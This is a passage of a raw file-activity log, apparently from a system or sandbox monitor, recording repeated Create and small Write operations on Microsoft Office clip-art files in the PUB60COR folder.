Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01785_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01805_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01905_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01954_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02009_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02022_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02024_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02025_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02028_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02045_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02048_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02051_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02054_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02055_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02067_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02094_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02227_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02228_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02233_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02252_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02253_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02261_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02263_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02265_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02268_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02269_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02270_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02276_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02413_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02431_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02437_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02439_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02464_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02465_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02578_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02617_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02790_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02791_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02793_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02794_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02862_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02886_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02958_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SPACE_01.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SPRNG_01.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\STUBBY1.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\STUBBY2.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SUMER_01.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SWEST_01.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00110_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00127_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00132_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00170_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00560_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00642_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00788_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00792_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00795_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00882_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01006_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01252_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107282.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107288.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107290.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107300.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107302.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107308.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107314.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107316.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107328.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107342.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107344.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107350.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107358.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107364.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107426.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107446.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107450.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107452.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107456.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107458.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107468.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107480.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107482.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107484.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107488.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107490.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107492.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107494.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107496.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107500.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107502.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107512.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107514.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107516.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107526.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107528.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107544.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107658.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107708.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107712.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107718.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107722.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107724.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107728.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107730.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107734.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107742.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107744.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107746.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107748.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107750.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0136865.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0150150.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0150861.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151041.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151045.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151047.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151055.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151061.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151063.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151067.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151073.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151581.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152414.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152430.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152432.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152436.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152556.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152558.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152560.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152568.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152570.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152590.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152594.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152600.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152602.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152606.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152608.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152610.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152622.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152626.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152628.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152688.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152690.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152694.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152696.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152698.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152702.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152704.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152708.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152716.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152722.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152876.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152878.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152882.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152884.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152890.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152892.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152894.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152898.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153047.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153087.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153089.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153091.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153093.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153095.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153265.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153273.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153299.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153302.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153305.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153307.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153313.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153398.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153508.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153514.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153516.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153518.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0156537.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157167.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157177.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157191.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157831.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0158071.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0158477.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0160590.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0168644.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0171685.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0171847.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172035.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172067.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172193.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174315.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174635.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174639.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG size = 1 True 1
Fn
Data
